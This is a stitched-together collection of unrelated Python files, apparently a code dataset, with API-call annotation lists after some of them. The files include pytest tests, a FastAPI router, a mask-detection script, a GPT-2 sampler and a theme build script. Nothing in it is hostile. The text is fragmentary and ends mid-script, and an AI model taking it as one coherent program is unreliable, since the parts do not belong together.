# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import pytest
from apgorm.types import Array, Int # for subtypes
@pytest.mark.parametrize("subtype", [Int(), Array(Int()), Array(Array(Int()))])
def test_array_init(subtype):
a = Array(subtype)
assert a.subtype is subtype
def test_array_sql():
assert Array(Int())._sql == "INTEGER[]"
assert Array(Array(Int()))._sql == "INTEGER[][]"
| [
"apgorm.types.Int",
"apgorm.types.Array"
] | [((1292, 1306), 'apgorm.types.Array', 'Array', (['subtype'], {}), '(subtype)\n', (1297, 1306), False, 'from apgorm.types import Array, Int\n'), ((1211, 1216), 'apgorm.types.Int', 'Int', ([], {}), '()\n', (1214, 1216), False, 'from apgorm.types import Array, Int\n'), ((1224, 1229), 'apgorm.types.Int', 'Int', ([], {}), '()\n', (1227, 1229), False, 'from apgorm.types import Array, Int\n'), ((1244, 1249), 'apgorm.types.Int', 'Int', ([], {}), '()\n', (1247, 1249), False, 'from apgorm.types import Array, Int\n'), ((1381, 1386), 'apgorm.types.Int', 'Int', ([], {}), '()\n', (1384, 1386), False, 'from apgorm.types import Array, Int\n'), ((1431, 1436), 'apgorm.types.Int', 'Int', ([], {}), '()\n', (1434, 1436), False, 'from apgorm.types import Array, Int\n')] |
from fastapi import FastAPI
from vogue.api.api_v1.endpoints import (
insert_documents,
home,
common_trends,
sequencing,
genootype,
reagent_labels,
prepps,
bioinfo_covid,
bioinfo_micro,
bioinfo_mip,
update,
)
from vogue.settings import static_files
app = FastAPI()
app.mount(
"/static",
static_files,
name="static",
)
app.include_router(home.router, tags=["home"])
app.include_router(common_trends.router, tags=["common_trends"])
app.include_router(sequencing.router, tags=["sequencing"])
app.include_router(genootype.router, tags=["genotype"])
app.include_router(reagent_labels.router, tags=["index"])
app.include_router(prepps.router, tags=["preps"])
app.include_router(bioinfo_micro.router, tags=["bioinfo_micro"])
app.include_router(bioinfo_covid.router, tags=["bioinfo_covid"])
app.include_router(bioinfo_mip.router, tags=["bioinfo_mip"])
app.include_router(update.router, tags=["update"])
app.include_router(insert_documents.router, tags=["sample"])
| [
"fastapi.FastAPI"
] | [((301, 310), 'fastapi.FastAPI', 'FastAPI', ([], {}), '()\n', (308, 310), False, 'from fastapi import FastAPI\n')] |
import torch.nn as nn
import torch.nn.functional as F
from dgcnn.pytorch.model import DGCNN as DGCNN_original
from all_utils import DATASET_NUM_CLASS
class DGCNN(nn.Module):
def __init__(self, task, dataset):
super().__init__()
self.task = task
self.dataset = dataset
if task == "cls":
num_classes = DATASET_NUM_CLASS[dataset]
# default arguments
class Args:
def __init__(self):
self.k = 20
self.emb_dims = 1024
self.dropout = 0.5
self.leaky_relu = 1
args = Args()
self.model = DGCNN_original(args, output_channels=num_classes)
else:
assert False
def forward(self, pc, cls=None):
pc = pc.to(next(self.parameters()).device)
pc = pc.permute(0, 2, 1).contiguous()
if self.task == 'cls':
assert cls is None
logit = self.model(pc)
out = {'logit': logit}
else:
assert False
return out
| [
"dgcnn.pytorch.model.DGCNN"
] | [((674, 723), 'dgcnn.pytorch.model.DGCNN', 'DGCNN_original', (['args'], {'output_channels': 'num_classes'}), '(args, output_channels=num_classes)\n', (688, 723), True, 'from dgcnn.pytorch.model import DGCNN as DGCNN_original\n')] |
from collections import deque
N, K = map(int, input().split())
T = [int(input()) for _ in range(N)]
ans_dq = deque([0, 0, 0])
for i, t in enumerate(T):
ans_dq.append(t)
ans_dq.popleft()
if sum(ans_dq) < K and i > 1:
print(i + 1)
break
else:
print(-1)
| [
"collections.deque"
] | [((109, 125), 'collections.deque', 'deque', (['[0, 0, 0]'], {}), '([0, 0, 0])\n', (114, 125), False, 'from collections import deque\n')] |
import cv2
import tensorflow as tf
from tensorflow import keras
import matplotlib.pyplot as plt
import numpy as np
model = "./AI_Mask_Detector/res10_300x300_ssd_iter_140000_fp16.caffemodel"
config = "./AI_Mask_Detector/deploy.prototxt"
# model = './AI_Mask_Detector/opencv_face_detector_uint8.pb'
# config = './AI_Mask_Detector/opencv_face_detector.pbtxt'
mask_model = tf.keras.models.load_model("./AI_Mask_Detector/model.h5")
probability_model = tf.keras.Sequential([mask_model])
width = 64
height = 64
# cap = cv2.VideoCapture(0)
cap = cv2.VideoCapture("./AI_Mask_Detector/demoVideo/test2.mp4")
if not cap.isOpened():
print("Camera open failed!")
exit()
net = cv2.dnn.readNet(model, config)
if net.empty():
print("Net open failed!")
exit()
categories = ["mask", "none"]
print("len(categories) = ", len(categories))
while True:
ret, frame = cap.read()
if ret:
img = cv2.cvtColor(frame, code=cv2.COLOR_BGR2RGB)
blob = cv2.dnn.blobFromImage(img, 1, (300, 300), (104, 177, 123))
net.setInput(blob)
detect = net.forward()
detect = detect[0, 0, :, :]
(h, w) = frame.shape[:2]
# print('--------------------------')
for i in range(detect.shape[0]):
confidence = detect[i, 2]
if confidence < 0.4:
break
x1 = int(detect[i, 3] * w)
y1 = int(detect[i, 4] * h)
x2 = int(detect[i, 5] * w)
y2 = int(detect[i, 6] * h)
# cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0))
margin = 0
face = img[y1 - margin : y2 + margin, x1 - margin : x2 + margin]
resize = cv2.resize(face, (width, height))
# print(x1, y1, x2, y2, width, height)
# cv2.imshow("frame1", resize)
# np_image_data = np.asarray(inp)
rgb_tensor = tf.convert_to_tensor(resize, dtype=tf.float32)
rgb_tensor /= 255.0
rgb_tensor = tf.expand_dims(rgb_tensor, 0)
# 예측
predictions = probability_model.predict(rgb_tensor)
# print(categories[predictions[i][1]], ' ' , np.argmax(predictions[i]))
# lebel = categories[predictions[i]]
if predictions[0][0] > predictions[0][1]: # and predictions[0][0] > 0.7:
label = "Mask " + str(predictions[0][0])
cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0))
cv2.putText(
frame,
label,
(x1, y1 - 1),
cv2.FONT_HERSHEY_SIMPLEX,
0.5,
(0, 255, 0),
1,
cv2.LINE_AA,
)
if predictions[0][0] < predictions[0][1]: # and predictions[0][1] > 0.7:
label = "No Mask " + str(predictions[0][1])
cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255))
cv2.putText(
frame,
label,
(x1, y1 - 1),
cv2.FONT_HERSHEY_SIMPLEX,
0.5,
(0, 0, 255),
1,
cv2.LINE_AA,
)
# print(predictions[0][0], ' ', predictions[0][1])
cv2.imshow("frame", frame)
if cv2.waitKey(30) == 27:
break
else:
print("error")
cap.release()
cv2.destroyAllWindows()
| [
"cv2.dnn.blobFromImage",
"cv2.rectangle",
"tensorflow.keras.Sequential",
"cv2.imshow",
"cv2.putText",
"cv2.destroyAllWindows",
"tensorflow.keras.models.load_model",
"cv2.VideoCapture",
"cv2.cvtColor",
"tensorflow.convert_to_tensor",
"tensorflow.expand_dims",
"cv2.resize",
"cv2.waitKey",
"c... | [((371, 428), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', (['"""./AI_Mask_Detector/model.h5"""'], {}), "('./AI_Mask_Detector/model.h5')\n", (397, 428), True, 'import tensorflow as tf\n'), ((449, 482), 'tensorflow.keras.Sequential', 'tf.keras.Sequential', (['[mask_model]'], {}), '([mask_model])\n', (468, 482), True, 'import tensorflow as tf\n'), ((541, 599), 'cv2.VideoCapture', 'cv2.VideoCapture', (['"""./AI_Mask_Detector/demoVideo/test2.mp4"""'], {}), "('./AI_Mask_Detector/demoVideo/test2.mp4')\n", (557, 599), False, 'import cv2\n'), ((675, 705), 'cv2.dnn.readNet', 'cv2.dnn.readNet', (['model', 'config'], {}), '(model, config)\n', (690, 705), False, 'import cv2\n'), ((3461, 3484), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3482, 3484), False, 'import cv2\n'), ((908, 951), 'cv2.cvtColor', 'cv2.cvtColor', (['frame'], {'code': 'cv2.COLOR_BGR2RGB'}), '(frame, code=cv2.COLOR_BGR2RGB)\n', (920, 951), False, 'import cv2\n'), ((967, 1025), 'cv2.dnn.blobFromImage', 'cv2.dnn.blobFromImage', (['img', '(1)', '(300, 300)', '(104, 177, 123)'], {}), '(img, 1, (300, 300), (104, 177, 123))\n', (988, 1025), False, 'import cv2\n'), ((3332, 3358), 'cv2.imshow', 'cv2.imshow', (['"""frame"""', 'frame'], {}), "('frame', frame)\n", (3342, 3358), False, 'import cv2\n'), ((1684, 1717), 'cv2.resize', 'cv2.resize', (['face', '(width, height)'], {}), '(face, (width, height))\n', (1694, 1717), False, 'import cv2\n'), ((1885, 1931), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['resize'], {'dtype': 'tf.float32'}), '(resize, dtype=tf.float32)\n', (1905, 1931), True, 'import tensorflow as tf\n'), ((1989, 2018), 'tensorflow.expand_dims', 'tf.expand_dims', (['rgb_tensor', '(0)'], {}), '(rgb_tensor, 0)\n', (2003, 2018), True, 'import tensorflow as tf\n'), ((3371, 3386), 'cv2.waitKey', 'cv2.waitKey', (['(30)'], {}), '(30)\n', (3382, 3386), False, 'import cv2\n'), ((2396, 2449), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x1, 
y1)', '(x2, y2)', '(0, 255, 0)'], {}), '(frame, (x1, y1), (x2, y2), (0, 255, 0))\n', (2409, 2449), False, 'import cv2\n'), ((2466, 2570), 'cv2.putText', 'cv2.putText', (['frame', 'label', '(x1, y1 - 1)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.5)', '(0, 255, 0)', '(1)', 'cv2.LINE_AA'], {}), '(frame, label, (x1, y1 - 1), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, \n 255, 0), 1, cv2.LINE_AA)\n', (2477, 2570), False, 'import cv2\n'), ((2908, 2961), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x1, y1)', '(x2, y2)', '(0, 0, 255)'], {}), '(frame, (x1, y1), (x2, y2), (0, 0, 255))\n', (2921, 2961), False, 'import cv2\n'), ((2978, 3082), 'cv2.putText', 'cv2.putText', (['frame', 'label', '(x1, y1 - 1)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.5)', '(0, 0, 255)', '(1)', 'cv2.LINE_AA'], {}), '(frame, label, (x1, y1 - 1), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, \n 0, 255), 1, cv2.LINE_AA)\n', (2989, 3082), False, 'import cv2\n')] |
# services/ovpn_server/project/tests/test_ovpn_server.py
import os
import json
import io
from flask import current_app
from project.tests.base import BaseTestCase
class TestOvpnServer(BaseTestCase):
def test_certificates(self):
with self.client:
pki_path = current_app.config['PKI_PATH']
token = current_app.config['SECRET_KEY']
response = self.client.post(
'/cert/upload',
data={
'file': (io.BytesIO(b'test'), 'test_cert.req'),
'cert': 'False'
},
content_type='multipart/form-data',
headers={'Authorization': f'Bearer {token}'}
)
data = json.loads(response.data.decode())
self.assertIn('file uploaded', data['message'])
self.assertEqual(response.status_code, 200)
self.assertTrue(os.path.isfile(f'{pki_path}/reqs/test_cert.req'))
os.remove(f'{pki_path}/reqs/test_cert.req')
self.assertFalse(os.path.isfile(f'{pki_path}/reqs/test_cert.req'))
def test_certificates_invalid_token(self):
with self.client:
filename = 'test_cert.crt'
token = "INVALID_TOKEN"
response = self.client.post(
'/cert/upload',
data={'file': (io.BytesIO(b'test'), filename)},
headers={'Authorization': f'Bearer {token}'}
)
data = json.loads(response.data.decode())
self.assertIn(f'Provide a valid auth token', data['message'])
self.assertEqual(response.status_code, 401)
def test_certificates_no_token(self):
with self.client:
filename = 'test_cert.crt'
response = self.client.post(
'/cert/upload',
data={'file': (io.BytesIO(b'test'), filename)},
)
data = json.loads(response.data.decode())
self.assertIn(f'Provide a valid auth token', data['message'])
self.assertEqual(response.status_code, 403)
def test_certificate_no_file(self):
"""
Tests response when there is no file being sent
"""
with self.client:
token = current_app.config['SECRET_KEY']
response = self.client.post(
'/cert/upload',
data={},
headers={'Authorization': f'Bearer {token}'}
)
data = json.loads(response.data.decode())
self.assertIn('No file', data['message'])
self.assertEqual(response.status_code, 400)
def test_certificates_invalid_file(self):
"""
Tests response when an invalid file is sent
"""
with self.client:
token = current_app.config['SECRET_KEY']
response = self.client.post(
'/cert/upload',
data={'file': (io.BytesIO(str.encode('test')), 'test.txt')},
headers={'Authorization': f'Bearer {token}'}
)
data = json.loads(response.data.decode())
self.assertIn('Not a valid file', data['message'])
self.assertEqual(response.status_code, 400)
| [
"os.path.isfile",
"io.BytesIO",
"os.remove"
] | [((977, 1020), 'os.remove', 'os.remove', (['f"""{pki_path}/reqs/test_cert.req"""'], {}), "(f'{pki_path}/reqs/test_cert.req')\n", (986, 1020), False, 'import os\n'), ((915, 963), 'os.path.isfile', 'os.path.isfile', (['f"""{pki_path}/reqs/test_cert.req"""'], {}), "(f'{pki_path}/reqs/test_cert.req')\n", (929, 963), False, 'import os\n'), ((1050, 1098), 'os.path.isfile', 'os.path.isfile', (['f"""{pki_path}/reqs/test_cert.req"""'], {}), "(f'{pki_path}/reqs/test_cert.req')\n", (1064, 1098), False, 'import os\n'), ((496, 515), 'io.BytesIO', 'io.BytesIO', (["b'test'"], {}), "(b'test')\n", (506, 515), False, 'import io\n'), ((1353, 1372), 'io.BytesIO', 'io.BytesIO', (["b'test'"], {}), "(b'test')\n", (1363, 1372), False, 'import io\n'), ((1857, 1876), 'io.BytesIO', 'io.BytesIO', (["b'test'"], {}), "(b'test')\n", (1867, 1876), False, 'import io\n')] |
# encoding: utf-8
from web.ext.acl import when
from ..templates.admin.admintemplate import page as _page
from ..templates.admin.requests import requeststemplate, requestrow
from ..templates.requests import requestrow as rr
from ..send_update import send_update
import cinje
@when(when.matches(True, 'session.authenticated', True), when.never)
class Admin:
__dispatch__ = 'resource'
__resource__ = 'admin'
from .suggestions import Suggestions as suggestions
from .mistags import Mistags as mistags
from .auth import Auth as auth
from .logout import Logout as logout
from .showinfo import ShowInfo as showinfo
from .requestoptions import RequestOptions as requestoptions
from .catalogoptions import CatalogOptions as catalogoptions
from .uploadfiles import UploadFiles as uploadfiles
from .updatedatabase import UpdateDatabase as updatedatabase
from .changepw import ChangePassword as changepw
from .showhistory import ShowHistory as showhistory
from .restoredatabase import RestoreDatabase as restoredatabase, CurrentProgress as currentprogress
from .updatehistory import UpdateHistory as updatehistory
def __init__(self, context, name, *arg, **args):
self._name = name
self._ctx = context
self.queries = context.queries
def get(self, *arg, **args):
if len(arg) > 0 and arg[0] != 'requests':
return "Page not found: {}".format(arg[0])
if 'view_status' not in args:
args['view_status'] = 'New/Pending'
if 'change_status' in args:
changed_row = self.queries.change_request_status(args['id'], args['status'])
try:
request_row = cinje.flatten(rr(changed_row))
except:
request_row = '' # Row was deleted
np_info = self.queries.get_requests_info(status=args['view_status'])
send_update(self._ctx.websocket, requestbutton=np_info.request_count, request_row=request_row, new_request_status=args['status'], request_id=args['id']) # Update the request count button
send_update(self._ctx.websocket_admin, requestbutton=np_info.request_count) # Update the request count button
requestlist = self.queries.get_requests(status=args['view_status'])
try:
requestinfo = np_info
except:
requestinfo = self.queries.get_requests_info(status=args['view_status'])
return requeststemplate(_page, "Requests", self._ctx, requestlist=requestlist, view_status=args['view_status'], requestinfo=requestinfo)
| [
"web.ext.acl.when.matches"
] | [((282, 331), 'web.ext.acl.when.matches', 'when.matches', (['(True)', '"""session.authenticated"""', '(True)'], {}), "(True, 'session.authenticated', True)\n", (294, 331), False, 'from web.ext.acl import when\n')] |
from unittest import TestCase
from day10 import KnotHasher
class TestKnotHasher(TestCase):
def test_calc(self):
sut = KnotHasher(5, [3, 4, 1, 5])
self.assertEqual(12, sut.calc())
def test_hash1(self):
sut = KnotHasher(256, '')
self.assertEqual('a2582a3a0e66e6e86e3812dcb672a272', sut.hash())
def test_hash2(self):
sut = KnotHasher(256, 'AoC 2017')
self.assertEqual('33efeb34ea91902bb2f59c9920caa6cd', sut.hash())
def test_hash3(self):
sut = KnotHasher(256, '1,2,3')
self.assertEqual('3efbe78a8d82f29979031a4aa0b16a9d', sut.hash())
def test_hash4(self):
sut = KnotHasher(256, '1,2,4')
self.assertEqual('63960835bcdc130f0b66d7ff4f6a5a8e', sut.hash())
| [
"day10.KnotHasher"
] | [((132, 159), 'day10.KnotHasher', 'KnotHasher', (['(5)', '[3, 4, 1, 5]'], {}), '(5, [3, 4, 1, 5])\n', (142, 159), False, 'from day10 import KnotHasher\n'), ((242, 261), 'day10.KnotHasher', 'KnotHasher', (['(256)', '""""""'], {}), "(256, '')\n", (252, 261), False, 'from day10 import KnotHasher\n'), ((376, 403), 'day10.KnotHasher', 'KnotHasher', (['(256)', '"""AoC 2017"""'], {}), "(256, 'AoC 2017')\n", (386, 403), False, 'from day10 import KnotHasher\n'), ((518, 542), 'day10.KnotHasher', 'KnotHasher', (['(256)', '"""1,2,3"""'], {}), "(256, '1,2,3')\n", (528, 542), False, 'from day10 import KnotHasher\n'), ((657, 681), 'day10.KnotHasher', 'KnotHasher', (['(256)', '"""1,2,4"""'], {}), "(256, '1,2,4')\n", (667, 681), False, 'from day10 import KnotHasher\n')] |
#!/usr/bin/env python3
import fire
import json
import os
import numpy as np
import tensorflow as tf
import model, sample, encoder
def interact_model(
model_name='117M',
seed=None,
nsamples=1000,
batch_size=1,
length=None,
temperature=1,
top_k=0,
top_p=0.0
):
"""
Interactively run the model
:model_name=117M : String, which model to use
:seed=None : Integer seed for random number generators, fix seed to reproduce
results
:nsamples=1 : Number of samples to return total
:batch_size=1 : Number of batches (only affects speed/memory). Must divide nsamples.
:length=None : Number of tokens in generated text, if None (default), is
determined by model hyperparameters
:temperature=1 : Float value controlling randomness in boltzmann
distribution. Lower temperature results in less random completions. As the
temperature approaches zero, the model will become deterministic and
repetitive. Higher temperature results in more random completions.
:top_k=0 : Integer value controlling diversity. 1 means only 1 word is
considered for each step (token), resulting in deterministic completions,
while 40 means 40 words are considered at each step. 0 (default) is a
special setting meaning no restrictions. 40 generally is a good value.
:top_p=0.0 : Float value controlling diversity. Implements nucleus sampling,
overriding top_k if set to a value > 0. A good setting is 0.9.
"""
if batch_size is None:
batch_size = 1
assert nsamples % batch_size == 0
enc = encoder.get_encoder(model_name)
hparams = model.default_hparams()
with open(os.path.join('models', model_name, 'hparams.json')) as f:
hparams.override_from_dict(json.load(f))
if length is None:
length = hparams.n_ctx // 2
print(length)
#elif length > hparams.n_ctx:
# raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)
#config = tf.ConfigProto(device_count={'GPU': 0})
config = tf.ConfigProto()
with tf.Session(graph=tf.Graph(),config=config) as sess:
context = tf.placeholder(tf.int32, [batch_size, None])
np.random.seed(seed)
tf.set_random_seed(seed)
raw_text = """Model {"""
#input("Model prompt >>> ")
context_tokens = enc.encode(raw_text)
output = sample.sample_sequence(
hparams=hparams, length=length,
context=context,
batch_size=batch_size,
temperature=temperature, top_k=top_k, top_p=top_p
)
saver = tf.train.Saver()
ckpt = tf.train.latest_checkpoint(os.path.join('models', model_name))
saver.restore(sess, ckpt)
from datetime import datetime
#while True:
generated = 0
import time
grand_start = time.time()
for cnt in range(nsamples // batch_size):
start_per_sample = time.time()
output_text = raw_text
text = raw_text
context_tokens = enc.encode(text)
#raw_text = input("Model prompt >>> ")
# while not raw_text:
# print('Prompt should not be empty!')
# raw_text = input("Model prompt >>> ")
#print(context_tokens)
#file_to_save.write(raw_text)
#for cnt in range(nsamples // batch_size):
while "<|endoftext|>" not in text:
out = sess.run(output, feed_dict={context: [context_tokens for _ in range(batch_size)]})[:,
len(context_tokens):]
for i in range(batch_size):
#generated += 1
text = enc.decode(out[i])
if "<|endoftext|>" in text:
sep = "<|endoftext|>"
rest = text.split(sep, 1)[0]
output_text += rest
break
context_tokens = enc.encode(text)
output_text += text
print("=" * 40 + " SAMPLE " + str(cnt+12) + " " + "=" * 40)
minutes, seconds = divmod(time.time() - start_per_sample, 60)
print("Output Done : {:0>2}:{:05.2f}".format(int(minutes),seconds) )
print("=" * 80)
with open("Simulink_sample/sample__"+str(cnt+12)+".mdl","w+") as f:
f.write(output_text)
elapsed_total = time.time()-grand_start
hours, rem = divmod(elapsed_total,3600)
minutes, seconds = divmod(rem, 60)
print("Total time to generate 1000 samples :{:0>2}:{:0>2}:{:05.2f}".format(int(hours),int(minutes),seconds))
if __name__ == '__main__':
fire.Fire(interact_model)
| [
"tensorflow.Graph",
"encoder.get_encoder",
"fire.Fire",
"tensorflow.placeholder",
"tensorflow.train.Saver",
"os.path.join",
"sample.sample_sequence",
"model.default_hparams",
"numpy.random.seed",
"json.load",
"tensorflow.ConfigProto",
"tensorflow.set_random_seed",
"time.time"
] | [((1595, 1626), 'encoder.get_encoder', 'encoder.get_encoder', (['model_name'], {}), '(model_name)\n', (1614, 1626), False, 'import model, sample, encoder\n'), ((1641, 1664), 'model.default_hparams', 'model.default_hparams', ([], {}), '()\n', (1662, 1664), False, 'import model, sample, encoder\n'), ((2059, 2075), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (2073, 2075), True, 'import tensorflow as tf\n'), ((4691, 4716), 'fire.Fire', 'fire.Fire', (['interact_model'], {}), '(interact_model)\n', (4700, 4716), False, 'import fire\n'), ((2155, 2199), 'tensorflow.placeholder', 'tf.placeholder', (['tf.int32', '[batch_size, None]'], {}), '(tf.int32, [batch_size, None])\n', (2169, 2199), True, 'import tensorflow as tf\n'), ((2208, 2228), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (2222, 2228), True, 'import numpy as np\n'), ((2237, 2261), 'tensorflow.set_random_seed', 'tf.set_random_seed', (['seed'], {}), '(seed)\n', (2255, 2261), True, 'import tensorflow as tf\n'), ((2405, 2554), 'sample.sample_sequence', 'sample.sample_sequence', ([], {'hparams': 'hparams', 'length': 'length', 'context': 'context', 'batch_size': 'batch_size', 'temperature': 'temperature', 'top_k': 'top_k', 'top_p': 'top_p'}), '(hparams=hparams, length=length, context=context,\n batch_size=batch_size, temperature=temperature, top_k=top_k, top_p=top_p)\n', (2427, 2554), False, 'import model, sample, encoder\n'), ((2626, 2642), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (2640, 2642), True, 'import tensorflow as tf\n'), ((2878, 2889), 'time.time', 'time.time', ([], {}), '()\n', (2887, 2889), False, 'import time\n'), ((1679, 1729), 'os.path.join', 'os.path.join', (['"""models"""', 'model_name', '"""hparams.json"""'], {}), "('models', model_name, 'hparams.json')\n", (1691, 1729), False, 'import os\n'), ((1772, 1784), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1781, 1784), False, 'import json\n'), ((2685, 2719), 'os.path.join', 'os.path.join', 
(['"""models"""', 'model_name'], {}), "('models', model_name)\n", (2697, 2719), False, 'import os\n'), ((2971, 2982), 'time.time', 'time.time', ([], {}), '()\n', (2980, 2982), False, 'import time\n'), ((4428, 4439), 'time.time', 'time.time', ([], {}), '()\n', (4437, 4439), False, 'import time\n'), ((2102, 2112), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (2110, 2112), True, 'import tensorflow as tf\n'), ((4142, 4153), 'time.time', 'time.time', ([], {}), '()\n', (4151, 4153), False, 'import time\n')] |
# Minimal demo script: import the local `saludos` module and invoke its
# greeting function. No arguments, no return value; output goes to stdout.
import saludos
saludos.saludar() | [
"saludos.saludar"
] | [((16, 33), 'saludos.saludar', 'saludos.saludar', ([], {}), '()\n', (31, 33), False, 'import saludos\n')] |
import re
import os
values = {
'uc': 'Vurple',
'lc': 'vurple',
'cl': '#116BB7',
}
def main():
infile = "yeti/variables.less"
f = open(infile, 'r')
lines = f.readlines()
f.close()
outfile = values['lc'] + "/variables.less"
f = open(outfile, 'w')
for line in lines:
line = re.sub('Yeti', values['uc'], line)
line = re.sub('yeti', values['lc'], line)
line = re.sub('#008cba', values['cl'], line)
line = re.sub('headings-font-family: @font-family-base', 'headings-font-family: @font-family-header-sans-serif', line)
if re.search("Open Sans", line):
line = re.sub('Open Sans', 'Lato', line)
line = '@font-family-header-sans-serif: "Orbitron", "Helvetica Neue", Helvetica, Arial, sans-serif;\n' + line
f.write(line)
f.close()
infile = "yeti/bootswatch.less"
f = open(infile, 'r')
lines = f.readlines()
f.close()
outfile = values['lc'] + "/bootswatch.less"
f = open(outfile, 'w')
for line in lines:
line = re.sub('Yeti', values['uc'], line)
if re.search("Open\+Sans", line):
continue
if re.search("web-font-path", line):
line = '@web-font-path2: "https://fonts.googleapis.com/css?family=Lato:400,700,400italic";\n' + line
line = '@web-font-path: "https://fonts.googleapis.com/css?family=Orbitron:300italic,400italic,700italic,400,300,700";\n' + line
line = line + '.web-font(@web-font-path2);\n'
f.write(line)
f.close()
infile = "yeti/index.html"
f = open(infile, 'r')
lines = f.readlines()
f.close()
outfile = values['lc'] + "/index.html"
f = open(outfile, 'w')
for line in lines:
line = re.sub('Yeti', values['uc'], line)
line = re.sub('yeti', values['lc'], line)
line = re.sub('UA-[0-9\-]+', '', line)
f.write(line)
f.close()
cmd = "/cygdrive/c/Users/keeshand/AppData/Roaming/npm/grunt swatch:{0}".format(values['lc'])
os.system(cmd)
cmd = "cp {0}/bootstrap.min.css ../vurple_com/pelican-themes/bootstrap3/static/css/bootstrap.{0}.min.css".format(values['lc'])
os.system(cmd)
cmd = "cp bower_components/font-awesome/css/*.css ../vurple_com/pelican-themes/bootstrap3/static/css/."
os.system(cmd)
cmd = "cp bower_components/font-awesome/fonts/* ../vurple_com/pelican-themes/bootstrap3/static/fonts/."
os.system(cmd)
cmd = "cp bower_components/bootstrap/fonts/* ../vurple_com/pelican-themes/bootstrap3/static/fonts/."
os.system(cmd)
cmd = "cp bower_components/bootstrap/dist/js/* ../vurple_com/pelican-themes/bootstrap3/static/js/."
os.system(cmd)
if __name__ == '__main__':
main()
| [
"re.sub",
"os.system",
"re.search"
] | [((2055, 2069), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2064, 2069), False, 'import os\n'), ((2210, 2224), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2219, 2224), False, 'import os\n'), ((2342, 2356), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2351, 2356), False, 'import os\n'), ((2469, 2483), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2478, 2483), False, 'import os\n'), ((2594, 2608), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2603, 2608), False, 'import os\n'), ((2717, 2731), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (2726, 2731), False, 'import os\n'), ((326, 360), 're.sub', 're.sub', (['"""Yeti"""', "values['uc']", 'line'], {}), "('Yeti', values['uc'], line)\n", (332, 360), False, 'import re\n'), ((376, 410), 're.sub', 're.sub', (['"""yeti"""', "values['lc']", 'line'], {}), "('yeti', values['lc'], line)\n", (382, 410), False, 'import re\n'), ((426, 463), 're.sub', 're.sub', (['"""#008cba"""', "values['cl']", 'line'], {}), "('#008cba', values['cl'], line)\n", (432, 463), False, 'import re\n'), ((479, 600), 're.sub', 're.sub', (['"""headings-font-family: @font-family-base"""', '"""headings-font-family: @font-family-header-sans-serif"""', 'line'], {}), "('headings-font-family: @font-family-base',\n 'headings-font-family: @font-family-header-sans-serif', line)\n", (485, 600), False, 'import re\n'), ((608, 636), 're.search', 're.search', (['"""Open Sans"""', 'line'], {}), "('Open Sans', line)\n", (617, 636), False, 'import re\n'), ((1071, 1105), 're.sub', 're.sub', (['"""Yeti"""', "values['uc']", 'line'], {}), "('Yeti', values['uc'], line)\n", (1077, 1105), False, 'import re\n'), ((1117, 1147), 're.search', 're.search', (['"""Open\\\\+Sans"""', 'line'], {}), "('Open\\\\+Sans', line)\n", (1126, 1147), False, 'import re\n'), ((1180, 1212), 're.search', 're.search', (['"""web-font-path"""', 'line'], {}), "('web-font-path', line)\n", (1189, 1212), False, 'import re\n'), ((1781, 1815), 're.sub', 're.sub', 
(['"""Yeti"""', "values['uc']", 'line'], {}), "('Yeti', values['uc'], line)\n", (1787, 1815), False, 'import re\n'), ((1831, 1865), 're.sub', 're.sub', (['"""yeti"""', "values['lc']", 'line'], {}), "('yeti', values['lc'], line)\n", (1837, 1865), False, 'import re\n'), ((1881, 1913), 're.sub', 're.sub', (['"""UA-[0-9\\\\-]+"""', '""""""', 'line'], {}), "('UA-[0-9\\\\-]+', '', line)\n", (1887, 1913), False, 'import re\n'), ((657, 690), 're.sub', 're.sub', (['"""Open Sans"""', '"""Lato"""', 'line'], {}), "('Open Sans', 'Lato', line)\n", (663, 690), False, 'import re\n')] |
#!/usr/bin/python3
from validData import *
from command import *
from readback import *
import sys
import time
# Expected Input
# 1: Row -> 0 to 9
# 2: Column -> 0 to 19
# Validate the CLI arguments before issuing the command:
#   argv[1] row: exactly one digit (documented range 0-9)
#   argv[2] column: one or two digits (documented range 0-19)
if (
    isInt(sys.argv[1]) and strLengthIs(sys.argv[1],1) and
    isInt(sys.argv[2]) and (strLengthIs(sys.argv[2],1) or strLengthIs(sys.argv[2],2))
):
    command = ["PixelToWeb"]
